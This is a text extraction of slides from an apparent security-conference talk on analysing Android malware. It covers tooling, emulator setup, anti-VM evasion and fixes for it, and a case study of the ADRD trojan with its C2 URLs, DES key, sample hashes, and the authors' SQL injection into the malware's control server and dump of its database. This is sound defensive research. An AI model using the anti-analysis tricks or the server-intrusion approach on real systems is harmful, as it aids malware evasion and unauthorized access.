doc8:30 PM - AlienVault
download 
Report Transcription
8:30 PM - AlienVault
!
Lost in translation
WTF is happening inside my Android
Phone
Ok
Cancel
8:30 PM
Contents
Contents
Android System
Static Analysis
Dynamic Analysis
Reversing
Red Bunny
Conclusion
Cancel
8:30 PM
Android architecture
8:30 PM
DALVIK VM
- Register-based virtual machine
- It uses its own bytecode, not Java bytecode.
- Run on a slow CPU with little RAM.
- Run on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.
8:30 PM
Dex file format
header
string_ids
type_ids
proto_ids
field_ids
method_ids
class_defs
data
8:30 PM
Analysis Environment
Tools
Case-sensitive file system :D
Android SDK
Android NDK
Android source code
Eclipse
Apktool, Dex2jar, JD-GUI
Android Emulator
8:30 PM
Example
Compiler
.java/source
.java/jd-gui
dex2jar
.dex/dexdump
.smali/baskmali
baskmali
8:30 PM
Anti-analysis
Examples:
- Easy: Use a.class and A.class as class names: the file will
be hidden on case-insensitive file systems.
- Medium: Optimize/ofuscate the code with ProGuard.
- Hard: Modify bytecode to break reversing tools (be
sure that it still runs on Dalvik.)
Ej: androguard-a1:
Insert value type
VALUE_ANNOTATION
if self.__value_type >= VALUE_SHORT
...
elif self.__value_type == VALUE_ARRAY :
...
elif self.__value_type == VALUE_BYTE :
...
elif self.__value_type == VALUE_NULL :
...
elif self.__value_type == VALUE_BOOLEAN :
...
else :
raise(“oops”)
8:30 PM
Dynamic Analysis
Basic:
- Create an Android Virtual Device. -> $android (SDK)
- $emulator -port 5560 @virtual-device -tcpdump capture.pcap
- $adb install app.apk
- $adb shell monkey -v -p package.app 700
- $adb shell logcat -d && $adb shell logcat -b events -d (radio also)
- $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
8:30 PM
Make it more real
- Simulate phone events:
Send SMS:
echo sms send +34656566789 test | nc localhost 5554
D/AT
( 32): AT< 00200b914356566687f900001120720274404004e3f0380c
Simulate calls:
$echo gsm call +34656566789 |nc localhost 5554
$echo gsm accept +34656566789 |nc localhost 5554
$echo gsm cancel +34656566789 |nc localhost 5554
Change GPS coordinates:
$echo geo fix -82.411629 28.054553|nc localhost 5554
8:30 PM
Dynamic Analysis
Advance:
- Create you own system image and modify the java classes to log the
program flow. Example, framework/base/core/java/android/os/
Process.java
8:30 PM
Compiling Android Kernel modules
$git clone git://android.git.kernel.org/kernel/common
$git branch -a
$git checkout --track -b android-goldfish-2.6.29 origin/androidgoldfish-2.6.29
$adb pull /proc/config.gz ./;gunzip config.gz; mv config .config
Edit and Add CONFIG_MODULES=y (disable by default on
emulator kernel)
$emulator -avd armv5y -kernel /tmp/zImage
8:30 PM
System-Call Hooking
$grep sys_call_table System.map
8:30 PM
Anti-VM
- Detecting the emulator is very easy:
DEVICE_ID:
String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
boolean emulator = TextUtils.isEmpty(id);
Solution:
Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db
IMSI:
TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
String imsi = manager.getSubscriberId(); (00000... on emulator)
Solution:
Patch the emulator binary (search for +CGSN string) or the emulator source code (external/
qemu/telephony/android_modem.c).
8:30 PM
More Anti-VM
- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
- Detect ADB stuff.. process, network, debug enabled...
- /proc/cpuinfo - > Hardware : Goldfish
- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t
change)
(Thanks Ehooo)
- Qemu specific detection (Google)
Solution:
Patch emulator, Qemu, system hooking...
8:30 PM
Alternatives to Android Emulator
- http://www.android-x86.org/ . Supports VMware
- Use a real phone... Slower
8:30 PM
Attack Vectors
- Alternative markets, repacked applications.
-SMS, MMS vulnerabilities, Fuzzing!!!.
- Wireless, Bluetooth Drivers
- NFC
- System componentes: Webkit,
sound library, Kernel.
8:30 PM
Third party software
Source: http://android.git.kernel.org/
8:30 PM
ADRD aka Redbunny
- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in
the Wild by Aegislab" ( http://blog.aegislab.com/index.php?
!
op=ViewArticle&articleId=75&blogId=1 )
Notification
- "[…] Today, we found a new Android trojan,
we call it "ADRD", which was not reported by any security vendors before.
[…]"
- Jaime Blasco and Pablo Rincón were working together,
analyzing this malware on Feb 2, 2011:
* Name: com.beautyfullivewallpaper
* Date: Feb. 2, 2011, 1:49 p.m.
- Also known as HongTouTou
8:30 PM
Detection
- Permission list:
* INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE,
RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS..
- Cipher module/library calls (DES):
* init Ljavax/crypto/Cipher; Lcom/xxx/yyy/ddda; decrypt
- Function calls to retrieve the IMSI/IMEI codes:
* IMEI: getDeviceId Lcom/xxx/yyy/MyService; onCreate
* IMSI: getSubscriberId Lcom/xxx/yyy/MyService; onCreate
- HTTP Requests (GET and POST):
* String str8 = "http://adrd.taxuan.net/index.aspx?im=" +
(String)localObject;
* adrd.xiaxiab.com POST /index.aspx?
im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace
3ed65910991f4dbd438af
8:30 PM
Detection
- Sends http requests through a proxy:
* HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
* HttpParams localHttpParams =
localDefaultHttpClient.getParams().setParameter("http.route.defaultproxy", localHttpHost);
- Services:
* com.xxx.yyy.MyService
* .beauty.Beauty
- Intents:
* android.intent.action.BOOT_COMPLETED **** -> Boots at system startup
* android.intent.action.PHONE_STATE
* android.net.conn.CONNECTIVITY_CHANGE
8:30 PM
Analysis I
Service module (MyService):
- Sets the preferred apn
1
- Runs each 12 hours
- Looks for specific APN network :
“CMWAP” || “UNIWAP”
Send data to adrd.taxuan.net/
index.aspx?im=%s:
+ IMEI
+ IMSI
+ Netway (preferred APN)
+ iversion
+ oversion
4
Sets a Proxy for GET/POST and
HTTP specially crafted headers
(UA, MIME types)
2
Cipher data module
3
public static String encrypt/decrypt
Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
adad.StartGo()
Sends http://adrd.xiaxiab.com/pic.aspx?im=
+encrypt(IMEI+IMSI
Parses the big list of ulrs/referers
B#1#963a_w1|http://59.173.12.105/g/
g.ashx?w=963a_w1
BBBB.Go() -> Retrieves search lists of
wap.baidu.com
FixUrls(): Send random requests adding
BAIDU_WISE_UID and HTTP_HEADERS.
6
Sends log data to control servers
Loop
+ Decrypt response
+ Switch(cmd) It depends on the
+ 0 Do nothing
+ 1 adad.StartGo()
+ 2 ParseO
+ 3 UpdateHelper()
5
UpdateHelper installs the update
apk
6
ParseO(): parse server response (number, flags, tags..):
T213607170863|12345|+你好-10086+是吗abc可能-597|回
[ 认'
6
8:30 PM
Analysis II
- Following the encryption routines, the DES key is found…: this.kk = "48734154";
* UpdateHelper class:
public class UpdateHelper
{
private static String savefilepath = "/myupdate.apk";
private Context ct;
private int netway;
* Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile &&
Unicom) and also SMS charges.
- Server URLs (there are more):
http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
- We want to know more!!
8:30 PM
Control Servers
- adrd.xiaxiab.com from an eagle view:
* Microsoft-IIS/6.0
* Debug Enabled (Displaying .NET errors and backtraces)
* Hidden paths to the .Net/aspx application
* ALL is Chinese! (WTF!?!"·$%&/(?)
- Possible vector attacks:
* HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
8:30 PM
Control Servers
- First results:
* Exceptions in chinese. Google Translate is your friend
Search
* Errors at .NET (it didn't generate any html list/table, or view to use for data displaying)
* We got a successful Sql injection after the last ciphered parameter :D).
* User without admin privileges.
* Permissions to run Backups + Shared Resources = Timeout
* Other possibilities:
+ 1: Create a temporal db, with just one table each time, dump paginated rows and run
backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang
didn't help)
+ 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current
attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for
performance reason.
8:30 PM
Database Information
- All the scheme obtained: list of Tables, Fields, types, stored procedures
- IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that
points to adrd.xiaxiab.com/down.aspx !
* Parameters:
@imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
* Store procedure:
--if (@netwap=2)
select 'T-1|T11'
--select 'T3http://adrd.xiaxiab.com/down.aspx'
--select 'T213607170863|12345|+你好-10086+是吗abc可能-597|回
[ 认'
--else
--select 'T013607170863'
* Looks that they were considering the netwap (based on the mobile operator) as a criteria to send
commands
* TX (where X seems to be a command type)
* 13607170863 is a phone number located at Wuhan
8:30 PM
Database Scheme
t_baiduHourPercent: autoid, mHour, mPercent
t_baidukeyword: keyword, viewcount
t_baidukeywordflash: keyword
t_baiduOrtherKey: keyword, viewcount
t_baidupwd: id, way, username, pwd
t_baiduwayname: way, wayname
t_keywordResult: id, keyword, link, head, flag
t_androidtemplog: id, imsi, way, result, createtime
t_keywordResult20100601: id, keyword, link, head, flag
t_keywordResult20101108: id, keyword, link, head, flag
t_baiduHourPercent20101012: autoid, mHour, mPercent
t_androidtemplog_backup: id, imsi, way, result, createtime
t_androidtemperrlog: id, compresslog, decompresslog, createtime
t_androidtemplog_backup201101: id, imsi, way, result, createtime
t_android访问记录: id, imei, imsi, logs, ip, createtime, netway
t_android日点击量表: 日期, 用户数, 点击量, 次数, createtime
t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
t_点击量切换计 表: way, maxClick, minClick, leaveTotalClick, leaveEffectClick
t_有效 键字_wap_20100323: keyword, createtime
t_有效 键字_wap_20100722备份: keyword, createtime
t_标准比对表: myear, mmonth, mday, mhour, total
t_点击量切换标志表: way, flag
t_任务表: keyword, flag
t_任务表_wap: keyword, flag
t_任务表_wap_back无效: keyword, flag
t_任务表_wap_back有效: keyword, flag
t_任务方式: flag
t_无效
键字: keyword, createtime
t_无效
键字_wap: keyword, createtime
t_有效
键字: keyword, createtime
t_有效
键字_wap: keyword, createtime
8:30 PM
Myupdate.apk
- It uses the main package of the ADRD family xxx.yyy.
- The update has other permissions: WRITE_SMS, READ_SMS,
RECEIVE_SMS, SEND_SMS..
- Looks like a google reader
- It adds a local sqlite DB (keyword storage).
go_g1_sms: id, keyword, type, flag
go_g2_sms: id, keyword, keyword2
- SMSObserver:
* Replaces keywords on SMS’s.
* Sends SMS!
8:30 PM
Samples
Package name
Md5
Adrd Ver
IVer
com.beautyfullivewallpaper
4556a687a2845bf4dfac62c594938cf3
adrd.zt.cw.1
6
com.yodesoft.yohandcar
6783cee889fa64df68af58a56ff6e362
adrd.zt.2
6
com.binaryloft.live.winter
aa5216da617839e818d83d8185da42b0
adrd.zt.jtj.2
6
com.magicwach.rdefense
839c37f3a2c8d31561d28f619a2a712e
adrd.zt.cw.3
6
com.tat.livewallpaper.dandelion
5192ad05597e7a148f642be43f6441f6
adrd.zt.cw.4
6
com.classicnerds.livewallpaper.HK
b72724d8fc0f633194dcc3bd28eec026
adrd.zt.cw.5
7
fishnoodle.night_city
a01ba26a34e55f71873782348ff5e074
adrd.zt.dxm.6 7
com.appspot.swisscodemonkeys.steam
cdfca19bf212adf3292e4fe677fe46a6
adrd.zt.cw.7
7
kr.mobilesoft.yxplayer
e3cc6c7af0d83fe322116254c01cf720
adrd.zt.cw.8
7
com.labgency.wallpapers.waves
7d764347a0b0c9d11160d7a7684bf02b
adrd.zt.dxm.8 7
com.laucass.andromax
627f41c8f8e7ab007641c4a0c1d8ce1b
adrd.zt.cw.9
7
com.digitalchocolate.androidrollergapp
71c0a67daa544450d7c620a48cc059b0
drd.zt.cw.12
7
proscio.wallpaper.shamroc
e09782d35d72a769dc7454adb6d8e2e9
adrd.zt.cw.15
7
com.tt.yy
f2596f8f3c52381318f62d1ab161c284
??
??
8:30 PM
Infections
g
Geolocation
8:30 PM
Infections
g
Infections by operator
+20K different IMSIs
Other affected operators:
Far EasT one
Peoples Telephone Company
Hutchison 3G
PCCW Mobile Sunday
Hong Kong Telecom
Smart One Mobile
8:30 PM
Thank You
!
Questions?
Ok
@jaimeblascob
@PabloForThePPL
Cancel
